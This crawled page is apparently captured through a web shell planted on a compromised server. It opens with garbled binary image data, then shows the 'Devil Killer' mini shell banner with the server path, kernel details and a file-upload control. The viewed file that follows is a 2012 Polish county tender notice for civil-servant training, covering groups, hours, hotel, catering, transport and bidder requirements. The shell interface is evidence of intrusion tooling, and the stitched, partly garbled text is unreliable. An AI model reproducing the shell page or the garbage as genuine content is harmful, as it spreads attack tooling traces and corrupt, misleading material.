JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120425/132642-N-2012.html

<p class="kh_header"><b>Bielsko-Biała: Organizacja i przeprowadzenie szkoleń dla realizacji projektu pn. Sprawny samorząd - kompetentny urzędnik, współfinansowanego ze środków Europejskiego Funduszu Społecznego , Priorytet V Dobre rządzenie, Działanie 5.2 wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej Programu Operacyjnego Kapitał Ludzki na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 132642 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Bielski , ul. Piastowska 40, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8136800, faks 033 8220672.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.bielso.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń dla realizacji projektu pn. Sprawny samorząd - kompetentny urzędnik, współfinansowanego ze środków Europejskiego Funduszu Społecznego , Priorytet V Dobre rządzenie, Działanie 5.2 wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej Programu Operacyjnego Kapitał Ludzki na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń dla realizacji projektu pn. Sprawny samorząd - kompetentny urzędnik, współfinansowanego ze środków Europejskiego Funduszu Społecznego , Priorytet V Dobre rządzenie, Działanie 5.2 wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej Programu Operacyjnego Kapitał Ludzki na lata 2007-2013.
2. Szkolenia podzielone zostały na kilka zadań wg poniższego zestawienia:
Zadanie 1
1.	Doskonalenie obsługi klienta - 4 grupy, 45 osób, tj. 3 grupy po 11 osób i 1 grupa 12 osobowa, po 16 godzin dla 1 grupy
2.	Rozwiązywanie problemów z trudnym klientem - 4 grupy, 45 osób, tj. 3 grupy po 11 osób i 1 grupa 12 osobowa po 16 godzin dla 1 grupy
3.	Profesjonalny urzędnik - 4 grupy, 45 osób, tj. 3 grupy po 11 osób i 1 grupa 12 osobowa po16 godzin dla 1 grupy 
4.	Kodeks postępowania administracyjnego - 4 grupy, 45 osób, tj. 3 grupy po 11 osób i 1 grupa 12 osobowa po16 godzin dla 1 grupy
5.	Prawo administracyjne i ustawy m.in. Prawo Zamówień Publicznych, Prawo Budowlane, Prawo Ochrony Środowiska, Rachunkowość, Pomoc Publiczna ,O gospodarce nieruchomościami- 4 grupy, 45 osób, tj. 3 grupy po 11 osób i 1 grupa 12 osobowa, 16 godzin dla 1 grupy
Zadanie 2
1.	Zarządzanie strategią - 2 grupy, 24 osoby tj. po 12 osób w każdej grupie po 16 godzin dla 1 grupy 
2.	Komunikowanie strategii - 2 grupy, 24 osoby, tj. po 12 osób w każdej grupie po 16 godzin dla 1 grupy 
3.	Zarządzanie zespołami zadaniowymi - 2 grupy, 24 osoby, tj. po 12 osób w każdej grupie po 16 godzin dla 1 grupy 
4.	Zarządzanie zmianą 2 grupy, 24 osoby, tj. po 12 osób w każdej grupie po 16 godzin dla 1 grupy
5.	Zarządzanie budżetem zadaniowym - 2 grupy, 24 osoby, tj. po 12 osób w każdej grupie po 16 godzin dla 1 grupy
6.	Finanse i kontroling w JST - 2 grupy, 24 osoby, tj. po 12 osób w każdej grupie po 16 godzin dla 1 grupy 
Zadanie 3
1.	MS Word w praktyce - 3 grupy, 30 osób, tj. po 10 osób w grupie po 16 godzin dla 1 grupy 
2.	MS Excel w praktyce - 3 grupy, 30 osób, , tj. po 10 osób w grupie po 16 godzin dla 1 grupy 
Zadanie 4
1.	Warsztaty doskonalące wiedzę z SZBI i SZJ. - 2 grupy, 22 osoby, tj. po 11 osób w grupie po 19 godzin dla 1 grupy 
2.	Warsztaty doskonalące dla audytorów ISO - 1 grupa, 13 osób, 18 godzin dla 1 grupy., 
Zadanie 5
1.	Kontrola zarządcza - 2 grupy, 22 osoby, tj. po 11 osób w grupie po 24 godziny dla 1 grupy

3. Dla każdego realizowanego szkolenia wykonawca:
1.	 przeprowadzi analizę potrzeb szkoleniowych w celu doprecyzowania programów szkoleń i dostosowania ich do potrzeb zamawiającego, 
2.	 Opracuje merytorycznie   i przygotuje materiały szkoleniowe dla każdego uczestnika w postaci segregatora, notatnika i długopisu, 
3.	 Przygotuje i wydrukuje pre i post testy wypełniane przez każdego z uczestników sprawdzające przyrost wiedzy i umiejętności po szkoleniu, które przeprowadzi na początku i końcu każdego szkolenia, 
4.	 Przygotuje i wydrukuje dziennik zajęć, listę obecności uczestników, kartę pracy trenera i poświadczenia odbioru certyfikatów - nazwiska uczestników otrzyma od zamawiającego nie później niż 7 dni przed terminem szkolenia,  
5.	 Przygotuje i wydrukuje certyfikaty ukończenia szkolenia dla uczestników, 
6.	 Przygotuje i wydrukuje ankiety satysfakcji uczestników szkolenia które przeprowadzi po każdym szkoleniu, 
7.	 zrealizuje szkolenie w liczbie godzin zgodnej z wyżej opisaną specyfikacją 
i z harmonogramem, który otrzyma od zamawiającego.
Dokumentacja szkoleniowa, ankiety, testy, listy uczestników, potwierdzenia odbioru certyfikatów, certyfikaty  oraz materiały szkoleniowe, segregatory i notatniki muszą zawierać informacje o dofinansowaniu projektu z Europejskiego Funduszu Społecznego zgodnie 
z logotypami wymaganymi przez  Instytucję Pośredniczącą tj. Ministerstwo Administracji 
i Cyfryzacji. 

4. Dla szkoleń z zadania 4 tj.  
1.	Warsztaty doskonalące wiedzę z SZBI i SZJ. - 2 grupy, 22 osoby, 19 godzin dla 1 grupy
2.	Warsztaty doskonalące dla audytorów ISO - 1 grupa, 13 osób, 18 godzin  dla 1 grupy
Wykonawca zapewni: dla każdej grupy szkoleniowej po:
1.	1 noclegu dla każdego uczestnika miedzy pierwszym a drugim dniem szkolenia,  
2.	wyżywienie; pierwszego dnia szkolenia obiad i kolację, drugiego dnia śniadanie i obiad dla każdego uczestnika,
3.	salę szkoleniową  z pełnym wyposażeniem na każdy dzień szkolenia, 
4.	serwis kawowy (2 przerwy kawowe dziennie dla wszystkich uczestników szkolenia + 1trener), 
5.	transport każdej grupy (11-13 osób) spod siedziby Starostwa Powiatowego do obiektu hotelowego w odległości nie większej niż 100 km od Starostwa Powiatowego w Bielsku Białej pierwszego dnia szkolenia oraz powrót z obiektu hotelowego do siedziby Starostwa Powiatowego drugiego dnia szkolenia 
Wykonawca zaproponuje organizację  i przeprowadzenie usługi szkoleniowej w min. 2 rożnych obiektach hotelowych.
Wykonawca zapewni możliwość wyboru obiektu hotelowego spośród wskazanych przez Wykonawcę.


4.1. Minimalne wymagania dotyczące zakwaterowania: 
 1)Wykonawca zakwateruje uczestników szkolenia w obiekcie hotelowym o standardzie
 odpowiadającym 3 gwiazdkowemu hotelowi w odległości max do 100 km od Starostwa
 Powiatowego w Bielsku Białej.
2)W cenie zakwaterowania musi być ujęta opłata klimatyczna - jeżeli obowiązuje.
Zakwaterowanie w pokojach 1, 2 - osobowych, w tym zakwaterowania min. 2 osób 
w pokojach 1 osobowych. 
3)Pokoje dwuosobowe  muszą być wyposażone w oddzielne łóżka. Wykonawca zobowiązany
jest do udostępnienia pokoi dla uczestników szkolenia minimum 1h przed rozpoczęciem
szkolenia i do 30 min po zakończeniu szkolenia - niezależnie od  własnych ustaleń
dotyczących godzin rozpoczęcia i zakończenia doby hotelowej. Zamawiający dopuszcza możliwość zarezerwowania dla potrzeb grupy przed rozpoczęciem jak i po zakończeniu zajęć jednego pokoju /pomieszczenia w celu złożenia bagażu .
4)W trakcie świadczenia usługi Zamawiającemu nie mogą być świadczone w obiekcie inne
usługi hotelarsko - gastronomiczne, bezpośrednio naruszające realizację programu szkolenia. 

4.2 Minimalne wymagania dotyczące wyżywienia:
1. Uczestnikom szkolenia zostaną podane: 
a)Pierwszego dnia szkolenia - obiad i kolacja. 
b)Drugiego dnia szkolenia - śniadanie i obiad. 
Śniadanie musi być podane w formie bufetu szwedzkiego. 
Obiad musi składać się z przystawki, zupy i dania głównego, soku owocowego  oraz deseru, herbaty, kawy. 
Kolacja podana przy wspólnym, stole dla wszystkich uczestników szkolenia. Składać się będzie z:  przystawek i dania podawanego na ciepło. Dodatkowo pieczywo, masło, soki owocowe, woda mineralna gazowana i niegazowana, kawa i herbata podana na życzenie, cukier. 

4.3. Minimalne wymagania dotyczące sali szkoleniowej:
 1)Sala wykładowa o pojemności nie mniejszej niż 20 osób (min. 40 m 2)  znajduje się 
w tym samym budynku co pokoje hotelowe i sala restauracyjna. Sala z pełnym wyposażeniem
- stół konferencyjny i krzesła, stolik i krzesło dla prelegenta, ekran, flipchart + blok
papierowy, flamastry, dostęp do Internetu, dostęp do gniazd umożliwiających podłączenie
urządzeń elektrycznych. 
2) W każdym dniu szkolenia zostaną zorganizowane dwie przerwy kawowe, w trakcie
których zostanie podana: kawa, herbata, woda mineralna (gazowana i niegazowana), soki,
cukier, mleczko, ciastka kruche. Przerwy kawowe zostaną zorganizowane w tym samym
budynku co szkolenia (najlepiej w tej samej sali lub jej sąsiedztwie). 



4.4. Minimalne wymagania dotyczące transportu:
1) Bus z klimatyzacją podstawiony pierwszego dnia szkolenia o godz. 7.00 pod siedzibę 
Starostwa Powiatowego w Bielsku Białej, Trasa Bielsko-Biała - obiekt hotelowy 
w odległości do 100 km od Starostwa Powiatowego w Bielsku-Białej. 
Bus z klimatyzacja podstawiony o godz. 17.15 drugiego dnia szkolenia pod obiektem
hotelowym. Trasa Obiekt hotelowy - Starostwo Powiatowe w Bielsku Białej.

5. Dla szkoleń z zadania 1, 2 i 5 tj.:
1.	Doskonalenie obsługi klienta - 4 grupy, 45 osób, 16 godzin dla 1 grupy
2.	Rozwiązywanie problemów z trudnym klientem - 4 grupy, 45 osób, 16 godzin dla 1
grupy
3.	Profesjonalny urzędnik - 4 grupy, 45 osób, 16 godzin dla 1 grupy
4.	Kodeks postępowania administracyjnego - 4 grupy, 45 osób, 16 godzin dla 1 grupy
5.	Prawo administracyjne i ustawy: m.in. Prawo Zamówień Publicznych ,Prawo
      Budowlane, Prawo Ochrony Środowiska, Rachunkowość, Pomoc Publiczna,O gospodarce nieruchomościami - 4 grupy, 45 osób, 16 godzin dla  1 grupy ,
6.	Zarządzanie strategią - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
7.	Komunikowanie strategii - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
8.	Zarządzanie zespołami zadaniowymi - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
9.	Zarządzanie zmianą - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
10.	Zarządzanie budżetem zadaniowym - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
11.	Finanse i kontroling w JST - 2 grupy, 24 osoby, 16 godzin dla grupy
12.	Kontrola zarządcza - 2 grupy, 22 osoby, 24 godziny dla 1 grupy
Wykonawca zapewni
1.	sale szkoleniową na każdy dzień szkolenia w obiekcie hotelowym o standardzie odpowiadającym 3 gwiazdkowemu hotelowi w odległości max do 100 km od Starostwa Powiatowego w Bielsku Białej, 
2.	obiad dla każdego uczestnika w trakcie każdego dnia szkolenia, 
3.	serwis kawowy (1 przerwa kawowa dziennie dla wszystkich uczestników szkolenia +1trener), 
4.	 transport ze Starostwa Powiatowego w Bielsku- Białej do obiektu hotelowego i z powrotem każdego dnia szkolenia. 
Wykonawca zaproponuje organizację i przeprowadzenie usługi szkoleniowej w min. dwóch rożnych lokalizacjach. 
Wykonawca zapewni możliwość wyboru obiektu hotelowego spośród wskazanych przez Wykonawcę.


5.1 Minimalne wymagania dotyczące sali szkoleniowej:
Sala wykładowa o pojemności nie mniejszej niż 20 osób (min. 40 m 2) z pełnym wyposażeniem - stół konferencyjny i krzesła, stolik i krzesło dla prelegenta, ekran, flipchart + blok papierowy, flamastry, dostęp do Internetu, dostęp do gniazd umożliwiających podłączenie urządzeń elektrycznych. 
W każdym dniu szkolenia zostanie zorganizowana jedna  przerwa  kawowa, w trakcie których zostanie podana: kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche. Przerwy kawowe zostaną podane w tym samym budynku co szkolenia. 

5.2Minimalne wymagania dotyczące obiadu
Obiad musi składać się z dania głównego oraz herbaty, kawy. 

3.5.3Minimalne wymagania dotyczące transportu
Bus z klimatyzacją podstawiony każdego dnia szkolenia o godz. 7.00 pod siedzibę Starostwa Powiatowego w Bielsku Białej. Trasa Bielsko-Biała - obiekt hotelowy w odległości do 
100 km od Starostwa Powiatowego w Bielsku-Białej. 
Bus z klimatyzacja podstawiony o godz. 17.15 każdego dnia szkolenia pod obiektem hotelowym. Trasa Obiekt hotelowy - Starostwo Powiatowe w Bielsku Białej. 

6. Dla szkoleń z zadania 3, które odbędą się w siedzibie Zamawiającego. 
1.	MS Word w praktyce - 3 grupy, 30 osób, 16 godzin dla 1 grupy 
2.	MS Excel w praktyce - 3 grupy, 30 osób, 16 godzin dla 1 grupy
Wykonawca zapewni: 
1.	Catering w postaci lunchu 
2.	serwis kawowy (1 przerwa kawowa dziennie dla wszystkich uczestników szkolenia 
+ 1 trener) kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.00.00.00-0, 60.14.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie trzech ostatnich lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy w tym okresie - wykonywał, a w przypadku świadczeń okresowych lub ciągłych wykonuje co najmniej dwie usługi w zakresie organizacji i przeprowadzenia szkoleń o wartości powyżej 200.000 zł każda, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz wraz z dołączeniem dokumentu potwierdzającego, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia w tym co najmniej:
1)	po 3 trenerów dla zadania 1 i zadania 2, którzy posiadają wykształcenie wyższe i przeprowadzili w ramach tematyki szkoleń z tych zadań co najmniej 100 godzin szkoleniowych;
2) po 2 trenerów dla zadania 3 i zadania 5, którzy posiadają wykształcenie wyższe i przeprowadzili w ramach tematyki tych zadań co najmniej 100 godzin szkoleniowych, 
3)  2 trenerami  dla zadania 4, którzy posiadają wykształcenie wyższe i przeprowadzili
w ramach tematyki zadania 100 godzin szkoleniowych;
   wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz ofertowy - Załącznik nr 1 do SIWZ;
2)Dokument z wykazem liczby metod/działań, które podejmie Wykonawca w celu zapewnienia najwyższej jakości realizacji procesu szkoleniowego -zał.Nr 2 do SIWZ,
3) Dokument z analizą zamówienia ze wskazaniem problemów i zagrożeń związanych z realizacją organizacji i prowadzenia szkoleń i propozycjami rozwiązań problemów bądź zapobiegania nim-zał.Nr 3 do SIWZ,
5 ) Dokument, w którym określona zostanie elastyczność  dokonywania ewentualnej  zmiany rezerwacji  hotelu lub sali bez ponoszenia kosztów z tym związanych-zał.Nr 4 do SIWZ.
6) wykaz proponowanych obiektów hotelowych dla realizacji usług objętych przedmiotem   zamówienia -zał. Nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Organizacja kontroli jakości realizacji procesu szkoleniowego - 25</li>
<li>3 - Wartość techniczna - 25</li>
<li>4 - Elastyczność dokonywania ewentualnej zmiany rezerwacji w obiekcie hotelowym - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza istotne  zmiany postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której wykonawca został wybrany do realizacji umowy 
w  następujących przypadkach: 
1)uzasadnionej konieczności zmiany osób, które będą uczestniczyć w wykonywaniu umowy na inne legitymujące się co najmniej równoważnymi kwalifikacjami zawodowymi, doświadczeniem, wykształceniem ,które  było wymagane przez Zamawiającego w SIWZ i w ogłoszeniu,
2)w przypadku uzasadnionej konieczności zmiany terminu realizacji projektu, za zgodą Instytucji Pośredniczącej dopuszcza się możliwość zmiany terminu realizacji umowy,  
3) zmiany obiektu hotelowego określonego w § 1 ust. 3 umowy pod warunkiem spełniania przez nowy obiekt kryteriów szczegółowo określonych w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.bielsko.pl<br>
